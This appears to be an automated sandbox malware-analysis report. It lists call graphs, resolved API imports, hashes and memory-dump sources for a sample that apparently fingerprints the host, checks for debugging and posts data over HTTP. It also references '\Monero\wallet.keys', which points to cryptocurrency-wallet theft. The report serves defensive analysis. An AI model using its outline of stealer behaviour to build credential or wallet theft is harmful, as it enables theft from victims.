14434->14435 14436 ff49b2 14435->14436 14437 100a9b0 4 API calls 14436->14437 14438 ff49d1 14437->14438 14439 100a8a0 lstrcpy 14438->14439 14440 ff49da 14439->14440 14441 100a920 3 API calls 14440->14441 14442 ff49f8 14441->14442 14443 100a8a0 
lstrcpy 14442->14443 14445 ff4a01 14443->14445 14444->13466 14446 100a9b0 4 API calls 14445->14446 14447 ff4a20 14446->14447 14448 100a8a0 lstrcpy 14447->14448 14449 ff4a29 14448->14449 14450 100a9b0 4 API calls 14449->14450 14451 ff4a48 14450->14451 14452 100a8a0 lstrcpy 14451->14452 14453 ff4a51 14452->14453 14454 100a9b0 4 API calls 14453->14454 14455 ff4a7d 14454->14455 14456 100a920 3 API calls 14455->14456 14457 ff4a84 14456->14457 14458 100a8a0 lstrcpy 14457->14458 14459 ff4a8d 14458->14459 14460 ff4aa3 InternetConnectA 14459->14460 14460->14416 14461 ff4ad3 HttpOpenRequestA 14460->14461 14463 ff4ebe InternetCloseHandle 14461->14463 14464 ff4b28 14461->14464 14463->14416 14465 100a9b0 4 API calls 14464->14465 14466 ff4b3c 14465->14466 14467 100a8a0 lstrcpy 14466->14467 14468 ff4b45 14467->14468 14469 100a920 3 API calls 14468->14469 14470 ff4b63 14469->14470 14471 100a8a0 lstrcpy 14470->14471 14472 ff4b6c 14471->14472 14473 100a9b0 4 API calls 14472->14473 14474 ff4b8b 14473->14474 14475 100a8a0 lstrcpy 14474->14475 14476 ff4b94 14475->14476 14477 100a9b0 4 API calls 14476->14477 14478 ff4bb5 14477->14478 14479 100a8a0 lstrcpy 14478->14479 14480 ff4bbe 14479->14480 14481 100a9b0 4 API calls 14480->14481 14482 ff4bde 14481->14482 14483 100a8a0 lstrcpy 14482->14483 14484 ff4be7 14483->14484 14485 100a9b0 4 API calls 14484->14485 14486 ff4c06 14485->14486 14487 100a8a0 lstrcpy 14486->14487 14488 ff4c0f 14487->14488 14489 100a920 3 API calls 14488->14489 14490 ff4c2d 14489->14490 14491 100a8a0 lstrcpy 14490->14491 14492 ff4c36 14491->14492 14493 100a9b0 4 API calls 14492->14493 14494 ff4c55 14493->14494 14495 100a8a0 lstrcpy 14494->14495 14496 ff4c5e 14495->14496 14497 100a9b0 4 API calls 14496->14497 14498 ff4c7d 14497->14498 14499 100a8a0 lstrcpy 14498->14499 14500 ff4c86 14499->14500 14501 100a920 3 API calls 14500->14501 14502 ff4ca4 14501->14502 14503 100a8a0 lstrcpy 14502->14503 14504 ff4cad 14503->14504 14505 100a9b0 4 API calls 14504->14505 14506 ff4ccc 
14505->14506 14507 100a8a0 lstrcpy 14506->14507 14508 ff4cd5 14507->14508 14509 100a9b0 4 API calls 14508->14509 14510 ff4cf6 14509->14510 14511 100a8a0 lstrcpy 14510->14511 14512 ff4cff 14511->14512 14513 100a9b0 4 API calls 14512->14513 14514 ff4d1f 14513->14514 14515 100a8a0 lstrcpy 14514->14515 14516 ff4d28 14515->14516 14517 100a9b0 4 API calls 14516->14517 14518 ff4d47 14517->14518 14519 100a8a0 lstrcpy 14518->14519 14520 ff4d50 14519->14520 14521 100a920 3 API calls 14520->14521 14522 ff4d6e 14521->14522 14523 100a8a0 lstrcpy 14522->14523 14524 ff4d77 14523->14524 14525 100a740 lstrcpy 14524->14525 14526 ff4d92 14525->14526 14527 100a920 3 API calls 14526->14527 14528 ff4db3 14527->14528 14529 100a920 3 API calls 14528->14529 14530 ff4dba 14529->14530 14531 100a8a0 lstrcpy 14530->14531 14532 ff4dc6 14531->14532 14533 ff4de7 lstrlen 14532->14533 14534 ff4dfa 14533->14534 14535 ff4e03 lstrlen 14534->14535 15474 100aad0 14535->15474 14537 ff4e13 HttpSendRequestA 14538 ff4e32 InternetReadFile 14537->14538 14539 ff4e67 InternetCloseHandle 14538->14539 14544 ff4e5e 14538->14544 14541 100a800 14539->14541 14541->14463 14542 100a9b0 4 API calls 14542->14544 14543 100a8a0 lstrcpy 14543->14544 14544->14538 14544->14539 14544->14542 14544->14543 15481 100aad0 14545->15481 14547 10017c4 StrCmpCA 14548 10017cf ExitProcess 14547->14548 14550 10017d7 14547->14550 14549 10019c2 14549->13468 14550->14549 14551 10018ad StrCmpCA 14550->14551 14552 10018cf StrCmpCA 14550->14552 14553 1001970 StrCmpCA 14550->14553 14554 10018f1 StrCmpCA 14550->14554 14555 1001951 StrCmpCA 14550->14555 14556 1001932 StrCmpCA 14550->14556 14557 1001913 StrCmpCA 14550->14557 14558 100185d StrCmpCA 14550->14558 14559 100187f StrCmpCA 14550->14559 14560 100a820 lstrlen lstrcpy 14550->14560 14551->14550 14552->14550 14553->14550 14554->14550 14555->14550 14556->14550 14557->14550 14558->14550 14559->14550 14560->14550 14562 100a7a0 lstrcpy 14561->14562 14563 ff5979 14562->14563 14564 ff47b0 2 API 
calls 14563->14564 14565 ff5985 14564->14565 14566 100a740 lstrcpy 14565->14566 14567 ff59ba 14566->14567 14568 100a740 lstrcpy 14567->14568 14569 ff59c7 14568->14569 14570 100a740 lstrcpy 14569->14570 14571 ff59d4 14570->14571 14572 100a740 lstrcpy 14571->14572 14573 ff59e1 14572->14573 14574 100a740 lstrcpy 14573->14574 14575 ff59ee InternetOpenA StrCmpCA 14574->14575 14576 ff5a1d 14575->14576 14577 ff5fc3 InternetCloseHandle 14576->14577 14578 1008b60 3 API calls 14576->14578 14579 ff5fe0 14577->14579 14580 ff5a3c 14578->14580 14582 ff9ac0 4 API calls 14579->14582 14581 100a920 3 API calls 14580->14581 14583 ff5a4f 14581->14583 14584 ff5fe6 14582->14584 14585 100a8a0 lstrcpy 14583->14585 14586 100a820 2 API calls 14584->14586 14588 ff601f ctype 14584->14588 14590 ff5a58 14585->14590 14587 ff5ffd 14586->14587 14589 100a9b0 4 API calls 14587->14589 14592 100a7a0 lstrcpy 14588->14592 14591 ff6013 14589->14591 14594 100a9b0 4 API calls 14590->14594 14593 100a8a0 lstrcpy 14591->14593 14602 ff604f 14592->14602 14593->14588 14595 ff5a82 14594->14595 14596 100a8a0 lstrcpy 14595->14596 14597 ff5a8b 14596->14597 14598 100a9b0 4 API calls 14597->14598 14599 ff5aaa 14598->14599 14600 100a8a0 lstrcpy 14599->14600 14601 ff5ab3 14600->14601 14603 100a920 3 API calls 14601->14603 14602->13474 14604 ff5ad1 14603->14604 14605 100a8a0 lstrcpy 14604->14605 14606 ff5ada 14605->14606 14607 100a9b0 4 API calls 14606->14607 14608 ff5af9 14607->14608 14609 100a8a0 lstrcpy 14608->14609 14610 ff5b02 14609->14610 14611 100a9b0 4 API calls 14610->14611 14612 ff5b21 14611->14612 14613 100a8a0 lstrcpy 14612->14613 14614 ff5b2a 14613->14614 14615 100a9b0 4 API calls 14614->14615 14616 ff5b56 14615->14616 14617 100a920 3 API calls 14616->14617 14618 ff5b5d 14617->14618 14619 100a8a0 lstrcpy 14618->14619 14620 ff5b66 14619->14620 14621 ff5b7c InternetConnectA 14620->14621 14621->14577 14622 ff5bac HttpOpenRequestA 14621->14622 14624 ff5c0b 14622->14624 14625 ff5fb6 InternetCloseHandle 
14622->14625 14626 100a9b0 4 API calls 14624->14626 14625->14577 14627 ff5c1f 14626->14627 14628 100a8a0 lstrcpy 14627->14628 14629 ff5c28 14628->14629 14630 100a920 3 API calls 14629->14630 14631 ff5c46 14630->14631 14632 100a8a0 lstrcpy 14631->14632 14633 ff5c4f 14632->14633 14634 100a9b0 4 API calls 14633->14634 14635 ff5c6e 14634->14635 14636 100a8a0 lstrcpy 14635->14636 14637 ff5c77 14636->14637 14638 100a9b0 4 API calls 14637->14638 14639 ff5c98 14638->14639 14640 100a8a0 lstrcpy 14639->14640 14641 ff5ca1 14640->14641 14642 100a9b0 4 API calls 14641->14642 14643 ff5cc1 14642->14643 14644 100a8a0 lstrcpy 14643->14644 14645 ff5cca 14644->14645 14646 100a9b0 4 API calls 14645->14646 14647 ff5ce9 14646->14647 14648 100a8a0 lstrcpy 14647->14648 14649 ff5cf2 14648->14649 14650 100a920 3 API calls 14649->14650 14651 ff5d10 14650->14651 14652 100a8a0 lstrcpy 14651->14652 14653 ff5d19 14652->14653 14654 100a9b0 4 API calls 14653->14654 14655 ff5d38 14654->14655 14656 100a8a0 lstrcpy 14655->14656 14657 ff5d41 14656->14657 14658 100a9b0 4 API calls 14657->14658 14659 ff5d60 14658->14659 14660 100a8a0 lstrcpy 14659->14660 14661 ff5d69 14660->14661 14662 100a920 3 API calls 14661->14662 14663 ff5d87 14662->14663 14664 100a8a0 lstrcpy 14663->14664 14665 ff5d90 14664->14665 14666 100a9b0 4 API calls 14665->14666 14667 ff5daf 14666->14667 14668 100a8a0 lstrcpy 14667->14668 14669 ff5db8 14668->14669 14670 100a9b0 4 API calls 14669->14670 14671 ff5dd9 14670->14671 14672 100a8a0 lstrcpy 14671->14672 14673 ff5de2 14672->14673 14674 100a9b0 4 API calls 14673->14674 14675 ff5e02 14674->14675 14676 100a8a0 lstrcpy 14675->14676 14677 ff5e0b 14676->14677 14678 100a9b0 4 API calls 14677->14678 14679 ff5e2a 14678->14679 14680 100a8a0 lstrcpy 14679->14680 14681 ff5e33 14680->14681 14682 100a920 3 API calls 14681->14682 14683 ff5e54 14682->14683 14684 100a8a0 lstrcpy 14683->14684 14685 ff5e5d 14684->14685 14686 ff5e70 lstrlen 14685->14686 15482 100aad0 14686->15482 14688 ff5e81 lstrlen 
GetProcessHeap RtlAllocateHeap 15483 100aad0 14688->15483 14690 ff5eae lstrlen 14691 ff5ebe 14690->14691 14692 ff5ed7 lstrlen 14691->14692 14693 ff5ee7 14692->14693 14694 ff5ef0 lstrlen 14693->14694 14695 ff5f04 14694->14695 14696 ff5f1a lstrlen 14695->14696 15484 100aad0 14696->15484 14698 ff5f2a HttpSendRequestA 14699 ff5f35 InternetReadFile 14698->14699 14700 ff5f6a InternetCloseHandle 14699->14700 14704 ff5f61 14699->14704 14700->14625 14702 100a9b0 4 API calls 14702->14704 14703 100a8a0 lstrcpy 14703->14704 14704->14699 14704->14700 14704->14702 14704->14703 14707 1001077 14705->14707 14706 1001151 14706->13476 14707->14706 14708 100a820 lstrlen lstrcpy 14707->14708 14708->14707 14710 1000db7 14709->14710 14711 1000f17 14710->14711 14712 1000ea4 StrCmpCA 14710->14712 14713 1000e27 StrCmpCA 14710->14713 14714 1000e67 StrCmpCA 14710->14714 14715 100a820 lstrlen lstrcpy 14710->14715 14711->13484 14712->14710 14713->14710 14714->14710 14715->14710 14718 1000f67 14716->14718 14717 1001044 14717->13492 14718->14717 14719 100a820 lstrlen lstrcpy 14718->14719 14720 1000fb2 StrCmpCA 14718->14720 14719->14718 14720->14718 14722 100a740 lstrcpy 14721->14722 14723 1001a26 14722->14723 14724 100a9b0 4 API calls 14723->14724 14725 1001a37 14724->14725 14726 100a8a0 lstrcpy 14725->14726 14727 1001a40 14726->14727 14728 100a9b0 4 API calls 14727->14728 14729 1001a5b 14728->14729 14730 100a8a0 lstrcpy 14729->14730 14731 1001a64 14730->14731 14732 100a9b0 4 API calls 14731->14732 14733 1001a7d 14732->14733 14734 100a8a0 lstrcpy 14733->14734 14735 1001a86 14734->14735 14736 100a9b0 4 API calls 14735->14736 14737 1001aa1 14736->14737 14738 100a8a0 lstrcpy 14737->14738 14739 1001aaa 14738->14739 14740 100a9b0 4 API calls 14739->14740 14741 1001ac3 14740->14741 14742 100a8a0 lstrcpy 14741->14742 14743 1001acc 14742->14743 14744 100a9b0 4 API calls 14743->14744 14745 1001ae7 14744->14745 14746 100a8a0 lstrcpy 14745->14746 14747 1001af0 14746->14747 14748 100a9b0 4 API calls 
14747->14748 14749 1001b09 14748->14749 14750 100a8a0 lstrcpy 14749->14750 14751 1001b12 14750->14751 14752 100a9b0 4 API calls 14751->14752 14753 1001b2d 14752->14753 14754 100a8a0 lstrcpy 14753->14754 14755 1001b36 14754->14755 14756 100a9b0 4 API calls 14755->14756 14757 1001b4f 14756->14757 14758 100a8a0 lstrcpy 14757->14758 14759 1001b58 14758->14759 14760 100a9b0 4 API calls 14759->14760 14761 1001b76 14760->14761 14762 100a8a0 lstrcpy 14761->14762 14763 1001b7f 14762->14763 14764 1007500 6 API calls 14763->14764 14765 1001b96 14764->14765 14766 100a920 3 API calls 14765->14766 14767 1001ba9 14766->14767 14768 100a8a0 lstrcpy 14767->14768 14769 1001bb2 14768->14769 14770 100a9b0 4 API calls 14769->14770 14771 1001bdc 14770->14771 14772 100a8a0 lstrcpy 14771->14772 14773 1001be5 14772->14773 14774 100a9b0 4 API calls 14773->14774 14775 1001c05 14774->14775 14776 100a8a0 lstrcpy 14775->14776 14777 1001c0e 14776->14777 15485 1007690 GetProcessHeap RtlAllocateHeap 14777->15485 14780 100a9b0 4 API calls 14781 1001c2e 14780->14781 14782 100a8a0 lstrcpy 14781->14782 14783 1001c37 14782->14783 14784 100a9b0 4 API calls 14783->14784 14785 1001c56 14784->14785 14786 100a8a0 lstrcpy 14785->14786 14787 1001c5f 14786->14787 14788 100a9b0 4 API calls 14787->14788 14789 1001c80 14788->14789 14790 100a8a0 lstrcpy 14789->14790 14791 1001c89 14790->14791 15492 10077c0 GetCurrentProcess IsWow64Process 14791->15492 14794 100a9b0 4 API calls 14795 1001ca9 14794->14795 14796 100a8a0 lstrcpy 14795->14796 14797 1001cb2 14796->14797 14798 100a9b0 4 API calls 14797->14798 14799 1001cd1 14798->14799 14800 100a8a0 lstrcpy 14799->14800 14801 1001cda 14800->14801 14802 100a9b0 4 API calls 14801->14802 14803 1001cfb 14802->14803 14804 100a8a0 lstrcpy 14803->14804 14805 1001d04 14804->14805 14806 1007850 3 API calls 14805->14806 14807 1001d14 14806->14807 14808 100a9b0 4 API calls 14807->14808 14809 1001d24 14808->14809 14810 100a8a0 lstrcpy 14809->14810 14811 1001d2d 14810->14811 14812 

                              Control-flow Graph

                              APIs
                              • GetProcAddress.KERNEL32(76210000,01981718), ref: 010098A1
                              • GetProcAddress.KERNEL32(76210000,019817D8), ref: 010098BA
                              • GetProcAddress.KERNEL32(76210000,019816D0), ref: 010098D2
                              • GetProcAddress.KERNEL32(76210000,01981730), ref: 010098EA
                              • GetProcAddress.KERNEL32(76210000,01981580), ref: 01009903
                              • GetProcAddress.KERNEL32(76210000,01988A30), ref: 0100991B
                              • GetProcAddress.KERNEL32(76210000,01975650), ref: 01009933
                              • GetProcAddress.KERNEL32(76210000,019753B0), ref: 0100994C
                              • GetProcAddress.KERNEL32(76210000,01981598), ref: 01009964
                              • GetProcAddress.KERNEL32(76210000,019816E8), ref: 0100997C
                              • GetProcAddress.KERNEL32(76210000,019815C8), ref: 01009995
                              • GetProcAddress.KERNEL32(76210000,019815E0), ref: 010099AD
                              • GetProcAddress.KERNEL32(76210000,01975670), ref: 010099C5
                              • GetProcAddress.KERNEL32(76210000,01981610), ref: 010099DE
                              • GetProcAddress.KERNEL32(76210000,01981760), ref: 010099F6
                              • GetProcAddress.KERNEL32(76210000,019755B0), ref: 01009A0E
                              • GetProcAddress.KERNEL32(76210000,01981778), ref: 01009A27
                              • GetProcAddress.KERNEL32(76210000,01981640), ref: 01009A3F
                              • GetProcAddress.KERNEL32(76210000,01975510), ref: 01009A57
                              • GetProcAddress.KERNEL32(76210000,01981820), ref: 01009A70
                              • GetProcAddress.KERNEL32(76210000,019754D0), ref: 01009A88
                              • LoadLibraryA.KERNEL32(019818B0,?,01006A00), ref: 01009A9A
                              • LoadLibraryA.KERNEL32(01981898,?,01006A00), ref: 01009AAB
                              • LoadLibraryA.KERNEL32(01981868,?,01006A00), ref: 01009ABD
                              • LoadLibraryA.KERNEL32(01981838,?,01006A00), ref: 01009ACF
                              • LoadLibraryA.KERNEL32(01981880,?,01006A00), ref: 01009AE0
                              • GetProcAddress.KERNEL32(75B30000,019817F0), ref: 01009B02
                              • GetProcAddress.KERNEL32(751E0000,01981808), ref: 01009B23
                              • GetProcAddress.KERNEL32(751E0000,01981850), ref: 01009B3B
                              • GetProcAddress.KERNEL32(76910000,01988DD8), ref: 01009B5D
                              • GetProcAddress.KERNEL32(75670000,019753D0), ref: 01009B7E
                              • GetProcAddress.KERNEL32(77310000,01988900), ref: 01009B9F
                              • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 01009BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 01009BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: a00ca2f16a9093ad1f57a9e651fef7133125f5630a4f54eb954ba15389ef39fa
                              • Instruction ID: 2bb30d617bde625b0d3af5d1d31a851846d7c96aa739f9b16d6782413d5e9e8f
                              • Opcode Fuzzy Hash: a00ca2f16a9093ad1f57a9e651fef7133125f5630a4f54eb954ba15389ef39fa
                              • Instruction Fuzzy Hash: D9A15BB55052409FD36AEFA8F98CE6A3BF9F79C701704853AA68AC724CD7399841DF10

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 ff45c0-ff4695 RtlAllocateHeap 781 ff46a0-ff46a6 764->781 782 ff474f-ff47a9 VirtualProtect 781->782 783 ff46ac-ff474a 781->783 783->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FF460E
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00FF479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF45C7, 00FF45D2, 00FF45DD, 00FF45E8, 00FF45F3, 00FF4617, 00FF4622, 00FF462D, 00FF4638, 00FF4643, 00FF4657, 00FF4662, 00FF466D, 00FF4678, 00FF4683, 00FF46AC, 00FF46B7, 00FF46C2, 00FF46CD, 00FF46D8, 00FF4713, 00FF471E, 00FF4729, 00FF4734, 00FF473F, 00FF474F, 00FF475A, 00FF4765, 00FF4770, 00FF477B
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string, repeated)
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 77a48a72d76f7343dd18e7e1c6cfac01218cf83067a8a9474dbad6e7e5196977
                              • Instruction ID: b37d09c84c8cc7c9aad032671875410b08472c31788667c040e9fd9febfbe9aa
                              • Opcode Fuzzy Hash: 77a48a72d76f7343dd18e7e1c6cfac01218cf83067a8a9474dbad6e7e5196977
                              • Instruction Fuzzy Hash: 074130707CB7146A8634FBA58C6EF9D7663DF936D0F40504EB8709E204CAA66508CDAA

                              Control-flow Graph (interactive graph not rendered; the basic blocks ff4880-ff4ef3 call InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, lstrlen, HttpSendRequestA, InternetReadFile and InternetCloseHandle)
                              APIs
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FF4839
                                • Part of subcall function 00FF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FF4849
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FF4915
                              • StrCmpCA.SHLWAPI(?,0198FB08), ref: 00FF493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FF4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,01010DDB,00000000,?,?,00000000,?,",00000000,?,0198FA98), ref: 00FF4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FF4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FF4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FF4E49
                              • InternetCloseHandle.WININET(00000000), ref: 00FF4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00FF4EC5
                              • HttpOpenRequestA.WININET(00000000,0198FA28,?,0198F400,00000000,00000000,00400100,00000000), ref: 00FF4B15
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • InternetCloseHandle.WININET(00000000), ref: 00FF4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 1d79ce4f14169516b66c2fa7220d65cff4c281fdf439ec35e74a03e26aefe94e
                              • Instruction ID: b71187582ce10f052c9c54e3a3a7bea18c0d37b1ecde2f5239edcf3e0084f94b
                              • Opcode Fuzzy Hash: 1d79ce4f14169516b66c2fa7220d65cff4c281fdf439ec35e74a03e26aefe94e
                              • Instruction Fuzzy Hash: 0912CF71A10219EAEB16EB90DD95FEEB379BF24300F5041A9A186670D0EF742F49CF61
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FF11B7), ref: 01007880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01007887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0100789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: e5dbef57d0068d093414532fd6c0ac36a25324f12e47e0f912bd8ddae78b2aa3
                              • Instruction ID: f4b7799cf2de66235715ce9fe44ee5e054a054ee50c7489c683480c2e10f8334
                              • Opcode Fuzzy Hash: e5dbef57d0068d093414532fd6c0ac36a25324f12e47e0f912bd8ddae78b2aa3
                              • Instruction Fuzzy Hash: 76F04FB1944208EBD714DFD9D949BAEFBB8EB04721F10026AFA45E3680C77815048BA1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 340cec86ee11992f609fd50682c334543b8eb6182568feeb9111df1b11409f29
                              • Instruction ID: 75e2c38c1a4ebb43862d42e0ffdab99478c7aee38064e652801065dc0b7e1498
                              • Opcode Fuzzy Hash: 340cec86ee11992f609fd50682c334543b8eb6182568feeb9111df1b11409f29
                              • Instruction Fuzzy Hash: 48D05E7490030CDBCB14DFE0E88D6EDBB78FB08321F000564D906A3340EA315491CBA5

                              Control-flow Graph

                              APIs
                              • GetProcAddress.KERNEL32(76210000,01975690), ref: 01009C2D
                              • GetProcAddress.KERNEL32(76210000,01975630), ref: 01009C45
                              • GetProcAddress.KERNEL32(76210000,01988FD0), ref: 01009C5E
